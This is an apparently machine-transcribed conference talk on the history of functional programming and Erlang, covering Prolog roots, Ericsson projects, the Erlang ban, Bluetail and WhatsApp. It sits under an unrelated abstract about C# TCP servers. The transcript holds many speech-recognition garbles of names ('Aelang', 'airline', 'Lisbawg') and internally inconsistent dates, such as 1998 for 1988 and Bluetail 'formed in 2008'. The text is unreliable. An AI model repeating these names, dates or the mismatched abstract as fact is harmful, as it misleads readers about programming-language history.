Many people say that the arrival of good garbage collected languages mean you don't have to worry about things like memory management any more. This might be the case for line of business software, but what about when you want to write a TCP server capable of dealing with a decent number of connections? In this talk we'll look at the challenges of TCP servers in C# by converting a synchronous, thread-per-client server to use hipster-compliant asynchronous evented IO and then optimising it not to die from GC pressure.
10.5446/50607 (DOI)
Hello. Can you hear me? Anybody hear me? Anybody not hear me? Put your hands up if you can't hear me. Yeah, I'm giving two talks here. So, I hope I'm giving the right talk. This is one about functional programming. I've sort of tried to interleave what I've done in functional programming with the history of what was happening at the time. So, I'm going to go back to about 1985 when I started doing this and kind of give it a historical perspective. I think when I started programming, there were only a few programming languages. I had to choose between Fortran and Assembler and Kobol. And now I think there's 2,500 programming languages to choose between. It's actually much easier to choose between three than 2,500. And of those, there's probably only about 30 or 40 that are worth using anyway. And that's tomorrow's lecture, how we got into this colossal mess and how we've totally fucked up all the software structures with far too many programming languages. And I'm one of the people who've been making programming languages, so I've kind of contributed to this. So, tomorrow I'll admit my sins and possibly think of, talk about some little ways of getting out of that. But that's tomorrow's lecture, not today's lecture. So, this lecture is all about, well, the title is Functional Programming the Long Load to Enlightenment. And I'm going to tell you about two things. I'm going to tell you a little bit about the history of functional programming. And I'm going to interleave that with my own personal involvement with that so you can kind of see where, how things fit in. And so, I'll run it along a sort of historical timeline. And that timeline starts back in, for my part, in about 1985. This slide actually, it's quite an old slide. I've used it quite a lot because it represents the world as it was in 1998 or 1999 when I gave an invited talk to the ICFP, International Conference on Functional Programming where I gave the history of airline. And it stops there for a reason, which I couldn't reveal at that conference. So, I shall reveal why it stops there and then what happened after that. So, I'm going to go back to 19, about 1985 when I, I used to be a physicist and I got a job at Ericsson in the computer science lab. And that was a newly started lab. And so, we were just kind of messing around with programming languages. So, here I am in 1995. I was a young lad of, you know, how old was I then, 30 or something, you know, with a glint in my eye and didn't know anything about programming. I used to be a physicist and I was without working as a computer scientist, which was quite fun. So, if you look, oh, sorry, just back off a little bit. If we look at the decades of programming, not many languages have really survived into the future. Some of them have took with them ideas and they've lasted forever. Others, others kind of died or they're still around because of legacy code, but they haven't influenced future languages. So, we have these decades of programming and in the, starting off in the 1950s, that was the first stage of programming languages like Lisbawg or Kobol, Mercury Auto Code, things like that came along. And what lived into the future was, I guess, the Fortran and the Kobol and the Lisb. Lisb was the progenitor of all the dynamic languages and Fortran was the progenitor of the statically typed imperative languages and so on. And then in the 60s, APL and PL1. PL1, of course, was at the time everybody said, well, PL1 is the language of the future. Everybody will be programming in PL1 and it wasn't the case. It wasn't the case. It didn't work out that way at all. 70s, basic, small talk, scheme, the born shell, C came along. Small talk, of course, the progenitor of the object-oriented languages. I mean, this was object-oriented done correctly. It was replaced by Java and C++ object-oriented done incorrectly. Small talk only got one thing wrong, was a concurrency model, but apart from that, it was a pretty decent language. And then, oh, wait a minute, I haven't got, well, it's a language which is survived today and still used. I should have put prolog in the list, which is 1972, but I don't think people use it today. It's highly influential and it's one of those nice languages that should have survived. But unfortunately, not many people use it. It has survived in niche domains like constraint logic programming, to schedule airlines and things like that. Basically, prolog is so good there aren't any problems that are worthy of its use. Robert Kowalski said that prolog was a solution in search of a problem, but there weren't any problems that were difficult enough for it. So people use Java and things like that instead. And then in the 90s, Haskell and a load of scripting languages came along. The real sort of Haskell type language came relatively late, they came in the 1990s. The logic programming languages came in the 70s, so actually 20 years ahead of the functional programming language. And I'm not talking about functional programming as an academic discipline, of course, with the church and the Lambda calculus from the 1930s, but nobody knew about that because he couldn't actually run any programs in the type of Lambda calculus in 1936 or something like that. And then in 2000, we've got C sharp and Scarlet and Go and 2010. I don't know which languages will survive from 2010, possibly Julia, which seems to be a very nice language. We'll have to look, have to give a lecture in 2030 to, probably won't be alive then. You'll have somebody here who will have to give a lecture in 2030. Right. So these are the kind of significant languages. I found this on the net somewhere and I sort of, somebody's just made a list. And I'm just looking at the dates when they came in. 1957, Fortran, first dynamic language, Lisp, 1960, first logic programming language prologue, or the arrow points wrongly, 1970, actually I said 72, it was 70 there. Small talk 80, actually, the small talk 72, which surprisingly was done in 1972. You could guess that from its name. And standard ML came in on 1984, Haskell 1990, we were talking about functional programming. Really there wasn't much functional programming before ML, I think, standard ML in 1984. Of course, although it came out in 1984, I didn't know about it in 1984. So when I started work, which was in 1985, what did I know about? Well, I knew about logic programming, I knew about prologue, and I knew about small talk. And of course, everybody knew about ADA and PL1 and the Algor family of languages. So I didn't actually realize I was a functional prologue, I was a closet functional programmer for five years, because I started off with prologue and small talk, kind of merged the two together to make a parallel programming, a parallel logic programming language. And that with time became more and more functional. So I sort of slowly sort of moved over to functional programming. Right. I just thought this was nice as well, because if you're functional programmers, there's a very nice talk by David Turner, which gives a history of the road to Haskell. And starts, of course, the Lambda calculus, or the typed Lambda calculus in 1936. These are from his lecture. Lisp came in 1960. Lisp is not actually an implementation of the Lambda calculus, because it turns out that McCarthy didn't actually know about the Lambda calculus at the time. It wasn't influenced by Church in the slightest. It was an independent invention. Then Algor 60, I swim, if you see what I mean, Peter Landon, one of his, he wrote this great paper, I think it's an 8, 800, was it 600 or 800? 800 programming languages, I believe. He had this I swim notation, which was the first, and then PAL and SASL. And in the late 1969 to 80, NPL, HOPE, and so on, came from Edinburgh. And by a strange coincidence, I had a job in Edinburgh, because I was a physicist and I'd just got a job working at Edinburgh. So I was fortunate enough to learn prologue from Robert Kowalski. The prologue was very early. And as a student there, we were all going like, well, Kowalski's either mad or he's a genius. We couldn't figure out which of the two it was, because we didn't really understand what he was talking about. And certainly years later, I've realized that he certainly wasn't mad. I mean, he was very smart. And then Rod Burstle did this new programming language, and then ML and then HOPE and then Miranda came out of that and then Haskell came out. And it's quite interesting, because I talked to David Turner about this, and he remembers coming to Ericsson, giving us a talk on SASL when I was doing Erlang, and we were exchanging ideas there. And we both remembered this. And we got on talking about types and dynamic types and static types, and I said, well, what do you think about types? And he said, oh, well, it doesn't really matter. So SASL was dynamically typed, Haskell was statically typed. It's not a religion. I mean, it's just a sort of practical thing. They're equally good, he said. And I thought, that's quite nice, because he was the father of the polymorphic statically typed languages, and yet he didn't really, he wasn't very religious about it. He's a very practical man. And then, OK, so that's functional programming. Logic programming. It actually came earlier, to Alan Colmarier and Philip Rosso, based on the work of Kowalski. Kowalski made a theorem proof of the horn clauses, which could be programmed in an efficient way, and out came logic, I mean, sequential logic, prologue. Because there was no time or anything like that, prologue turns out to be quite easy to parallelize. And so the first parallel programming languages came out in the early 80s, concurrent prologue, and parlogue, and KL1, flat GHC. These are languages that very much influenced AILANG, not in the syntax or anything like that, but in the implementation. Because when we were doing AILANG, we were looking to how parlogue had implemented and how KL1 was implemented to gain inspiration. This is all before I started work. This is prehistory. In 1982, something very significant happened. Japan started, the Minister of International Trade started an $850 million project to create a massively parallel computer based on prologue. This was a Japanese effort, and it came out in 1982. And this guy, Ed Wood Shapiro, as an American, went off to Japan, sent there, and he wrote a study, and he reported back, and he said, as part of Japan's effort to become a leader in the computer industry, the Institute for the New Generation Computer Technology has launched a revolutionary tenure plan for the development of large computer systems which will be applicable to knowledge information systems. This was the fifth generation. And that report didn't have much significance. I think it was largely until Fygenbaum wrote this book, The Fifth Generation, which came out, I think in, I can't remember the date, I think it was 83, something like that. Yeah, I think it was 83. This book caused a storm in America. And they said, the Japanese are going to build this thing, this massively powerful parallel computer that can do everything. And we have to do something about this. And so as a result of that, in the US, very quickly, they formed the strategic computing initiative with DARPA funding, which is going to fund it with $1 billion from 1983 to 1993. And one of the people in there wrote, the machine would run 10 billion instructions a second to see here, think like a human. You know, it was going to do real-time natural language translation and all these things. It was fantastic. Wow, this is great. Once we built this megalip prologue machine, I just put there, in 1987, they cut all the funding for this project because they weren't getting anywhere. And the project kind of fizzled out by 1987. But in 83, there was loads of money around. And in Britain, the Alvee project started, and they chucked in 350 million pounds to build a machine, it was a declarative machine to build Hope. Hope was a sort of, it'd come out of ML and new programming language from Edinburgh. It was called Hope Park Square, which is in Edinburgh. And the Department of Machine Intelligence and Artificial Intelligence were centered around Hope Park Square. And they were going to make this declarative architecture that would execute declarative, functional, and logic programs extremely quickly. And if you look at Hope, that's factorial function in Hope, looks like that. And you'll notice very similar to what factorial looks like in Haskell or Erlang or any of these programming languages. They all kind of date back from there. So that's a prehistory. And so then I arrive at Erickson in 1985. The projects haven't been cancelled because it's not yet up to 1987 where they realized none of this stuff was going to work and cut all the funding. And the funding is absolutely amazing. So it's really good. And everybody's rushing around going, what the hell, you know, prologue, prologue, let's build declarative machines and do all this stuff. So I sort of arrived there. And I learned prologue and I thought, wow, prologue, everybody's going to do everything in prologue in the future, if I thought. Turned out to be completely wrong, but that's what I thought at the time. So here we are in 1985. And at the time, everybody said, well, AIDA and PL1 are going to be the languages of the future. Everybody's going to be programming PL1 forever. How many of you are programming PL1? How many in AIDA? Oh, one person. Very good. Thank you very much. Yes, right. So I take with a pinch of salt. Somebody says, well, everybody's going to be programming in Java plus plus in the future or whatever they say. Because these things last a few years and then something better comes. Well, if something better doesn't come along with Sunk, because we need better stuff. In 1985, IBM was at its height. It had 450,000 employees worldwide. And it actually started syncing after that. Microsoft Windows was released in November. Machines had a few megabytes of memory. So this is 1985. It's a typical PC, typical, no, it wasn't a typical PC you could buy if you had lots of money. It's not the one you bought at home. It was one that bought for you at work. And it had a colossal 256 kilobytes of RAM. You could extend it up to three megabytes by adding a few expansion cards in. You needed a lot of, these are big cards you plug them in. And it had this blazingly fast 8 megahertz clock. And you could have a 20 or 10 megabyte hard disk. That's 1985, actually. So you have to ask yourself, you know, that thing in 1985 would boot in 120 seconds, process a day, 10,000 times faster, should boot in 12 milliseconds. But my machine doesn't boot in 12 milliseconds. So what the hell went wrong? I'll be talking about that in my lecture tomorrow, what the hell went wrong. Different subject. So using machines like this, I wanted to program this. This is a telephony, because I work for Ericsson, this is a telephony flow diagram. It shows three parallel processes. Time is proceeding down the screen and message passing is sent between them. It's a three communicating finite-step machines. And I want to find a convenient way to program that. So I wrote, right about 1985, I discovered Prolog and I started writing these things in Prolog. And I was trying to dig out the first version. I completely lost the first version. So the first version I could find is this documentation for version 1.06. And in the comments it says version 1.03 lost in the midst of time. So I haven't actually got anything that goes back beyond that. So that's the first ever thing that I could find. And yeah, so that's kind of around about 1986. I was actually developing a programming language. I didn't know I was doing developing a programming language at the time. If anybody had said that in 30 years time or 20 years time lots of people would be using it, I just said they were mad, because I didn't even know I was making a programming language. So having developed a programming language, the first significant thing that happened was we had the good fortune to come in contact with a group of people who wanted to use the technology we were developing. This is Shrestha Nerdling. And she had an application. She wanted to build something. Now I would recommend, you know, it's very good if you're making a new technology, get a user. You know, I mean, computer scientists will just invent stuff. If they're given nothing to do, computer scientists will just invent stuff, which is totally useless, right? Because they don't actually have any problems. Given no problems at all, they will invent their own problems and solve them. So you want a real human being of flesh and blood, somebody who isn't interested in programming, isn't interested in computer science and wants to build something, right? And then you cherish them. So this is Shrestha Nerdling. And what she wanted to do was program this thing. This is a telephone exchange. It's an MD 110. And she worked out a better way of programming these. These were programmed in a language called Plex. Plex was a, for its time, it comes from 1978. It was a very good programming language. It's probably the precursor of a lot of object-oriented programming languages. But it was proprietary. It was secret. Nobody knew anything about it. And for that reason, it never spread. But it had certain concepts in it, like blocks and signals, which have correspondences in languages like prologue. Sorry, not prologue. Small talk and language like that. Above all, it had memory protection between processes. So LLang's got a lot of things that came from Plex, actually. The memory protection in particular came from Plex. She wanted to program this thing. And she was a great fan of what she called fishbone diagrams. These are logic trees that are sheer decision trees. They haven't got no cycles in terms like that. She would write diagrams like this. That's a bit of a fishbone diagram. It's just a finite state machine with no cycles in it. But what you want to do is execute lots and lots of them in parallel. So you've got thousands of them running in parallel. So how do you run lots and lots of these in parallel? So that was the question I wanted to answer. Given a finite state machine, how do you do that? Well, one way of doing it is to run it and suspend it by putting it into a database and then when it wakes up, pull it out of the database. That's not a really good way of doing it. There are other ways of doing that. The way we hit upon or thought up was just to put this in a process. It's in memory. We need a very lightweight mechanism for doing this. So I wrote this in Prologue. And this was, oh, there we are, back again. That was, if you look at that diagram there, it turns out to be a bit of code that looked like that. That's Prologue, actually, because Prologue has in-fix operators. And so I could do that in Prologue. But Prologue is a sequential language. And so the way of implementing concurrency was you execute a sequential process. And then when it runs out of things to do, more or less run to completion. Actually run for a certain number of inferences or until it wants to receive a message and it has no such message. And then suspend it. Suspend it means putting it in a database. And then just a simple round-roll in scheduler. So I wrote that stuff. And then by 1988, this was delivered to Shestyn Oadling and her group. And they built a telephony exchange with it, a prototype of that. But it wasn't very quick. Here you can see I called a multiprocessor version. This is the first version that had parallel processes in. And as you can see, it took four days to, there was four days with total rewrite of the language. So I mean, that's just a smallish Prologue program. Maybe a couple of thousand lines of Prologue. You could rewrite it all in a few days. And it was pretty slow. It was doing 245 reductions a second. A reduction is just a function call. But it was fast enough to be able to prototype this telephone exchange that we wanted to build. For 1998, Ericsson took a decision to make a product based on that. We decided that we would have to speed up the implementation language. Far too slow. It had to be about 8,000 times faster to make it into a product. Then we needed documentation and all this other stuff. So we started two activities in parallel. One was the programming of the product, which we expected to take about two years. And the other was the speeding up of the virtual machine, which we also expected to take about two years. We thought they would converge and be fast enough. And we could do all this stuff. So in 1998, we started that project. We needed to develop courses. This is before PowerPoint. So it was just sort of hand drawn overheads on slides. I'm not a very good artist. But I had quite fun doing the slides. I think PowerPoint just sort of killed all creativity. This is a head and tail of a list. We needed documentation. You've got to have documentation. I wrote the complete documentation of the first airline system, which fit into one page, actually. So that's the first documentation. I mean, it's now 120,000 files of XML or something. It's a bit bigger than that. But that was good enough. And the users were very good. They didn't complain if you changed the language. If the next version of the language wasn't the same as the version they had the week before, they just happily swallowed that without complaining. So it's very good. And we had small machines. Remember I said that machine was pretty small. So stuff we didn't use, we removed. Nowadays, you've got whacking great big machines. All this crap that you should throw away. You don't have to throw it away because your machines are so big, you can swallow all the crap as well as the good stuff. But in those days, we had to throw away all the rubbish because space was limited. Right. That was the documentation. Performance. Performance was absolutely lousy. This is a sort of time plot up to the late 1984. It just shows the number of reductions per second and the technology we use to do that. And the green and red shows, green is experiments and red is production. If you put this stuff into production, and you'll see there that there's a gap. It's about a sort of you're in a half period when you mess around with an interpreter or an implementation technique and then you deploy it. And you've got these phasing in and coming out with different technologies. So the one killer reductions per second that was the interpreters. We did a failed experiment with strand of the logic programming language developed by Ian Foster based on KL1 and the Japanese fifth generation languages. And that's the first and last time I ever predicted how fast something would go before I had implemented it because we confidently told people how fast this thing would go before we'd implemented and measured and were completely wrong. So I've never done that since then. So all the project managers keep going, when will your program run? I don't know. How fast will it be? I don't know. And you just stone wall forever. If a project manager asks you when your software will be ready, just say, I don't know. I've never done it before. And never give in. Right. Because you always get into trouble. If you say it's going to take six weeks and it takes two years, you get into trouble. And even if you take six weeks and it takes two minutes, you're also getting into trouble. And you never know. So just say, don't know. Right. So that was the failed experiment. There was no production. And then there was a jam, the Joe's abstract machine based on the Warren abstract machine. And that was in production for quite a long time until it was replaced by a better machine. And here we get up to 1988. So this is, I don't know if you want to know how Aelang works. Anybody want to know how Aelang works? Briefly. Oh, jolly good. So this is how Aelang works. Each process has got a stack and a heap and some registers. And all of that fits into about 350 bytes. Okay. And it's preallocated. So we have preallocate, actually, I think we preallocate a kilobyte per process in that the stack and heap that grows together in a set of registers. I'll just look at it. This is how the jam worked, actually. Aelang's got terms, symbolic terms. Think of them as structs in C. So here's a struct containing a rectangle, an atom a rectangle. That's a symbol. And a couple of integers, 10 and 20. So in memory, that's represented as a tag pointer. Or was it? Yeah, it's still represented as a tag pointer. It's a tag that says, hey, I'm pointing to a tuple. That can be on the stack or heap. And there's an address. And at that point on the heap, in fact, for a tuple, it'll always be on the heap. It points to a tag pointer and says, hey, this a3, arity3, that says, I'm a struct with three things in it. And then there are three pointers. It says, hey, I'm an atom. And there's a pointer into an atom table. And then there's something that says, hey, I'm an immediate integer. And the value of 10 is in there. This is for a 32-bit or 64-bit machine. That's the memory organization. So if you wanted to build that tuple, you could say, push integer 20, push, stack and heap, you say, push integer 20, push integer 10, push atom rectangle, and make tuple 3. This is pretty much like the old Warren machine used to work. You're just moving things from the stack and heap with instructions. Okay. So when you've done all that, you're going to have something like that on, wait a moment, the built object, the tuple, you're going to have a tuple that points to something on the heap. That says, I'm a struct of three words long, and it says, I'm an atom, and here's the point. Everything's fully tagged, and it's just sitting on the heap. It doesn't take much space. And the code to do that, let's suppose we've got a function foo that returns a tuple 10 ABC. The complete code just says, well, enter foo, that's just a label that says, this is the start of the foo function. What are you going to do? Push atom ABC, push in 10, make tuple 2 and return. Now each of these things just becomes byte code. If I take those two instructions, push int 10 and make tuple 2, well, the push int 10 might be the byte code 16 because it's a byte code of machine, 10 is the immediate value. It's a push short integer instruction. 20 might mean make tuple, and the argument's 2. And then there's just a little C interpreter that just interprets that. So it's pretty simple. That's literally the compiler to do that just spits out byte code, the emulator just executes that. It's very much like the JVM, very much like the.NET virtual machine. The instructions in many instances pretty similar, actually. I mean, the push integer just sort of sticks an integer on the stack, but I can't really do anything else. So I wrote a compiler for that in Erlang itself, because we had one in Prolog, and then I wrote an emulator for that in Prolog again, and here it was, the jam. You can see from the handwriting it says I wanted to call it Joseph, Joseph's super Erlang programming. No, that didn't really fit. And then Joseph's engine, and it actually went at 3012. That was an Erlang reduction per second when it was interpreted. We could compile this into this byte code and execute it with, again, all in Prolog. That ran at 35. And we could compile it once a day when I went home and it would be ready the next morning so you could run it. But that was good enough. We ran through all the test bench suites and everything, and ran at 35. But the whole machine design was ready, and so Mike Williams then came along. Mike's my mate who knew C. I was writing this in C, and I had never written C before. I started writing it to speed it up. I had written Fortran before that. My first ever C program was C virtual machine to run Erlang. And Mike read it and said this is the worst program I have ever seen in my entire life. So he rewrote it. So now there were three. Robert had joined me about a year before. He's writing all the libraries. I write the compiler and Mike was writing the emulator. And we did that. And yeah, now it beatled along at, oh, about 100,000 reductions per second. It was really quite quick. Well, C is actually better than Prolog for implementing virtual machines. It's almost as if he's assembler. So it's pretty good. So here we are. We're at 1990. Yeah. And we've got this thing going. So what happens now? Show the movie. Oh, no, I won't show that. Hop over that. And we had great fun. This is the lab in 1992. We had to illustrate concurrency for people. Parallelism. So we thought, how do you do that? Well, we have a model train and a telephone exchange. And we'll control them from different parallel processes in the same virtual machine. So, and this was at a, this was the best, people who went on the Erlang course always remember this. Because the exercise, you put two trains on the tracks. There's one here. Can you see the mouse pointing to the left? And we put another train pointing to the right. And the programming exercise was to swap them. And there were little sensors that told you when. So there's really real time programming, actually. Great fun. And there's Robert. And we showed this at a trade fair together with the telephone. It was controlling the exchange at the same time. That was in 1992. So that was quite fun. And then what happened? Right. Well, nothing much happened then. 1992 to 1995, nothing much happened. We started Erlang user conferences and things. And that's one of the first ones. It was, at that time, it wasn't open source. It was limited to Ericsson. And we had one room with held 80 people. And that's the number of people who could come. And we had our yearly conference with great fun. Then one of the two things, two things have led to Erlang being a successful programming language. One of the first of these two things happened on the 8th of December 1995. A project called AXEN was cancelled. That was a big project. It was going to do everything in C++. It had been running for about six years. And a lot of programmers were involved in this. And it was cancelled. And it was, Ericsson had built the hardware and the software. And the software just didn't work. By coincidence, we were working in the same building as this project. So we knew all about it. And we'd also been itching to program their hardware. So we managed to get hold of the hardware after a lot of opposition. So we were programming the same application as they were programming. And we'd done it with six people. And they'd done it with about 800 people. And at the time, words were said and things. So we were very un-tactful in those days, I think, about the differences here. So we got a lot of enemies by mistake, which is coincidental. But anyway, they cancelled the AXEN project and decided to keep all the hardware and now do it in LN. Okay, because we could do that. So we started in LN group. And that started this OTP stuff. I moved from a lab into a production organization. We formed this OTP group. And I was technically responsible for this. And we started building this OTP system. And so in 1996, this project called AXD started. And stuff happened really, really quickly. We built up a group. We retrained 60 programmers, became LN programmers, and they programmed away. And off we went. And 1996 to 1998 not much happened. They were just kind of building their stuff. This is typical. You have these periods of stuff that happens really quickly. And then you have these long periods where nothing appears to happen. And then things happen really, really quickly. But in 1998, nothing much happened until we get to the end of the slide. That's the reason why the slide ends there. Because, well, I have to go back a bit, see why it ends here is, well, in 1998, the AXD is a tremendous success. It works stupendously well. And it's sold all over the place. And it was such a success that Ericsson banned it, banned Erlang. Right. And there were reasons for that. So I don't really want to go. Well, two of the reasons were it wasn't Java. And the second reason it wasn't C++. And Ericsson had taken some strategy decisions to only program in Java and C++. So it wasn't really that they didn't, it wasn't what it was that upset people. It was what it wasn't that upset people. So they decided to ban it. And that's why this slide stops there. Because I had to give a talk at ICFP about the same date after it had been banned. And so we were rather in this awkward position of saying, you know, going out there and saying, why are those great, you know, Ericsson's using it. We're doing all this wonderful stuff. I didn't really want to say it had been banned because that would sort of, you know, stifle any enthusiasm in the audience. You know, maybe I'll go and try it. And then they know that it's been banned. And so I just sort of forgot to tell them that, which was funny. So I met Vianna Sirstrup and he said, oh, C++ was banned 11 times, he said. So I thought, we've only been banned once, I think. It was, yeah, so we were banned. Now that was really bad news, actually. Well, at the time it was really bad news. I thought I couldn't sleep, I couldn't get ulcers, oh, dear, what are we going to do? So, well, what happened after that was quite fun because, for any moment, we were banned. So after it was banned, there was about a four-month period where the computer science lab people sort of went into a little huddle and went, what should we do, what should we do, what should we do? Well, we can't fight the technical director because he's a very big, big, powerful man. So I know we'll all quit. We said, start a company. We want to use Erlang, right. So then Erlang, after four months, became open source through a mechanism that still amazes me that we actually managed to persuade the Erricks of management, well, if we're not going to use it, release it as open source. And we managed to do that amazingly. I still don't understand how. And four days after it released as open source, we all left by a strange coincidence. And the matter, well, it turned out, you know, there's Dilbert Carty, venture capitalist, and just hand you money and stuff. Well, that was in the golden days of 1998. So four days later, we formed Blue Tail. And the Erricks and the Erlang development split into two groups. Basically, the people had been in the computer science lab. We all left and started a company. And the people inside Erricks had built the commercial product stuff. They went into flying under the radar mode. They didn't really want to annoy anybody. And so we keep changing the name so they wouldn't notice Erlang. It was quite good. Now, seriously, if your project is banned, change the name, okay? No, I'm serious. Years later, I was working in Erricks and then my boss came in and said, this project you're doing, do you want the good news or the bad news? What's the bad news? Well, the project you're working on has been cancelled. So what's the good news? We're starting a new project. Just change the name. It's taken six months to catch on. Right. It's a very good method. Right. So it's split into two. And so now I'm not actually in Erricks anymore. I'm now outside Erricks. And I haven't been watching carefully what's been going on. Haskell is now becoming pretty popular. Prologue has lost popularity totally. It's kind of sunk like a stone. It's niched into constraint logic programming. And interest in parallel machines has gone. There was a whole flurry of trying to make parallel architectures gone. Because every single project that tried to make a parallel machine failed. And every single research project that tried to parallelise legacy code failed. Failed managed to get a 15% speed up after massive efforts. I mean, people have been trying to parallelise as long as Fortran has been around and they've never got more than 15%. And everybody's arguing about dynamic and static typing and lazy evaluation and egress. We're all having great arguments. This is 1998. Right. In this period now from 1998 to 2014, this was the... BlueTale was formed in 2008. Things now are on the track to where we are today. After two years, BlueTale was acquired for $154 million, which was kind of nice because we had formed it and known stock in it. And it was quite fun. And a guy called Alexey Sheplin, I don't know if I'm pronouncing his name correctly, started building an XMPP server in Erlang using the Ukraine. BlueTale was acquired by Altium Web Systems. Altium Web Systems was acquired by Nortel Networks. Nortel Networks went bankrupt. Everybody got fired. And then out of the embers of these groups, then three companies formed. TailF formed out of the embers of the collapse of Nortel Networks. Clana was founded and these are founded in 2005. In 2006, we'll learn more about those later. 2006, Alexey Sheplin was awarded the Erlang user for the year. 2007, I wrote a book on Erlang because I hadn't written one for 14 years. Then things started, then the application started coming out. Facebook chat was suddenly announced. Two guys in Facebook had written a chat server in Erlang. It was deployed now and it was running the chat services inside Facebook. 2008, this book that I had written about Erlang, that stimulated the Haskell people. Andrew Sullivan wrote this, suddenly O'Reilly said, why are we publishing books of our fucking small programming? And I've been saying for years, publish the stuff, get the books out so people can learn to do it. And the whole movement started building up then. 2009, WhatsApp was founded. Actually quite interestingly, because of a number of reasons. One was they were looking at the Facebook server at the time, the Facebook chat server and that seemed to be good. It was the highest performing XMPP server that you could make on the planet. XMPP server had captured more than, I think about, okay, so a company called Process One had taken this and were competing with a Java server. The Erlang server was not only faster than the Java server, I think it was about four times faster, but it was free. And the Java server cost money, so they had a product that was four times faster and free. So that swept the world. We had 60, 70% of the XMPP market. XMPP is this instant messaging protocol, XML-based protocol that's used in, corporations tend to use it more and they're open Java servers, for example, for using XMPP. That server was the basis of the Facebook chat engine. And so at that time, oh, and there was now one or two books, I'd written my book and my good friend Francesco Cisarini and Simon Thompson. Francesco was a master's student that I supervised at Ericsson and he went on to form Erlang solutions. He subsequently wrote programming Erlang. I can never remember which is which. The O'Reilly book. And so the WhatsApp people said, whoa, okay, so we're going to build this application and they started building it in Erlang with 10 engineers in 2009. Same year as the Erlang books came out and then a load of more books came out. And then in 2014, of course, WhatsApp was acquired for $19 billion by Facebook, which is ironic really because by then they had dropped Facebook chat and re-implemented it in Java plus plus or something. And the reason for that was they said they couldn't get any, you know, the Erlang stuff didn't fit into their infrastructure. So what they had built themselves with their own engineers, they then bought later for $19 billion from somebody else to buy not only the technology but the user base, which I think is interesting to say the least. So there we go. So if you look back at this, you'll see in this time scale, when you're developing a technology, it seems to go in sort of periods of sort of, there's a gap about three to five years before you sort of rush into this new area that we're going to use this new technology. We get all excited and you start a project, you start a company or something like that. And then nothing seems to happen because you've got to do three to five years work before there's a result. And then they pop out three to five years upstream and then there's a massive flurry of attention. So Erlang's gone like that for the last, we keep on going like, oh, nothing's happening, nobody's using it. And then suddenly you all start tweeting, hey, WhatsApp's been sold for the largest acquisition ever and it's all programmed in Erlang. Oh, that's cool. And then so the Erlang user conference in San Francisco suddenly, it was quite funny, they had parallel sessions but the WhatsApp guys were talking about how they built WhatsApp application in Erlang and there were some parallel sessions. But not many people went to the parallel sessions. In fact, no people at all went to the parallel sessions and I think the schedule in the smallest room or something. It was a great room change at the last moment. Anyway, so how it spread has actually been rather like the spread of publishing, printing from the Gutenberg, did the first printing press. There was a 14-year delay. It took seven years to be an apprentice and once you'd been an apprentice after seven years, you had to work for your master or whatever it was called, for a seven-year period and then you could go and start your own company. About every 14 years, it was a doubling. What we've seen in the Erlang development is actually the sort of Erlang DNA started in the computer science lab. It stayed there for quite a long time. It split into, it split into BlueTale, this is outside Ericsson by the way, it split into BlueTale. BlueTale lasted three or four years. It split into TailF and Clana. This is a sort of genetic material. Clana is a banking, online banking place in Sweden that is the hottest IT banking startup in Sweden, now employs about, I don't know, lots and lots of people. It was expanding. It's all written in Erlang, the front end, back end written in Java and things like that. TailF they do net comps and sold into Cisco and places like that. Then Erlang solutions sort of split off and does consulting. They cross-owned BASCHO which is done React database and TriFort. BASCHO is done React database which found itself all over the place. There are other things outside that consortium. CouchDB, for example, is quite a few databases written in Erlang. CouchDB is written in Erlang and was chosen by CERN for the Large Hadron experiment and helped discover the Higgs boson. Erlang helped discover the Higgs boson which is quite nice because I'm an ex-physicist. Where have we got to? Oh, yes, technical. In the same period as these companies and things were going on, I think we've come back full circle now to looking at parallelism again because the thing that Erlang is kind of pretty suited for, which gave it a boost in 2004, 2005 was how to handle concurrency because the multi-core computers came along. In 2007, Intel made, I think it's called a Phoenix, I can't remember the name Phoenix or something, an 80-core network on chip architecture which did 1.1 teraflops at 62 watts. That's totally amazing performance. 2007, Ty Lira came out with the Ty L64 and I managed to get hold of the first production batches of those things and we took it into the lab and ported Erlang to it. We took one, we had a telephony application, we ported it to the Ty L64 without doing it. It ran 33 times faster. Just the first time. Didn't do anything to the code at all and we're very pleased about that. We showed it to the management and they said, why doesn't it go 64 times faster? We said, who's he? I don't know. I wanted it to go 64 times faster. I'm looking at adaptive as made this parallel board. I think these network on chip architectures are really, in 2015 we'll probably see 1,024 cores commercially available running at about 15 watts. These are supercomputers on a single chip and I think the key to the future is actually low energy. The people making the chips say these are high performance chips but nobody can think of applications that need that performance unless we simulate that and unless we do whole brain simulations and things like that that need massive computing power. There are very few problems that need that amount of computing power. On the other hand, we do need low energy computation and low energy computation can be achieved by massive parallelization and by dropping clock frequencies. There's a new generation of processors which become highly parallel with very low clock frequencies which have different funny cache behaviors and learning to take code or learning to program those is essential for generating low energy applications. I think that's very interesting. The modeling programming model actually fits into that quite nicely because caching is extremely important there. All Elling processors just have their own little cache and heap. Having written it with processors you've already ensured that those processors are cached. They can't look at anybody else's memory or anything like that. I think it's well placed for that. Just a few observations. The predictions that people were making in 1985 were almost completely wrong. The predictions as to which languages would be used in the future turned out to be completely wrong. Predictions about use of legacy code turned out to be completely wrong. I remember quite clearly when I worked for Ericsson talking to the head of strategy and he said, in the future everybody will be programming Plex because that was the language that we programmed in. I said, no, we won't. He said, yes, we will. It's company strategy. New products will be programmed in Plex as we have always promised our customers backwards compatibility with Plex. I said, no, no, it won't happen. 20 years time, not a single line of Plex will be written. I was right. We don't write any Plex at all. Zero, squelch, zero. The only Plex we've done, we've bunged into virtual machines. We don't dare change a single line of code because we will introduce 2.5 errors for every line of code we change. We put them in a virtual machine and nobody knows what they do. Hopefully one day we will chuck them away in the bin because it's rubbish. It's not rubbish, but it works. Nobody knows why it works. That's my lecture tomorrow. People who wrote the stuff are dead and there's no spec. Right. It's tricky. The most significant events that led to sort of alien escaping and things were totally unplanned and were non-technical in nature. They were things like being banned. They're things like projects failing and running in when they fail. All this good argument just never worked ever. Well, it did. You sort of do it. You know this engineer stuff? What's the problem? List the sort of 10 best solutions, take three of them, study them and build prototypes and then go to the management with the results of the best prototype and they'll go and do that. That doesn't work at all. Wait for a crisis and run in quickly. That's what you should do. Look for projects that are going to fail. That's a good tip. When all else fail, when they're drowning, when all else fails, save me. They rush in. That's the time to do it. Some predictions of future technology were correct. I remember some old blucks saying go parallel young man. The future is parallel. We said that in about 1980, mid-80s and it's completely correct. That's where the future is, parallel computing. We're going into this transition period of trying to learn how to program parallel computers. We're in this, I noticed a couple of days ago Apple released this Swift parallel functional programming language. They were like, oh, it's great. Apple joined this functional programming band wagon. 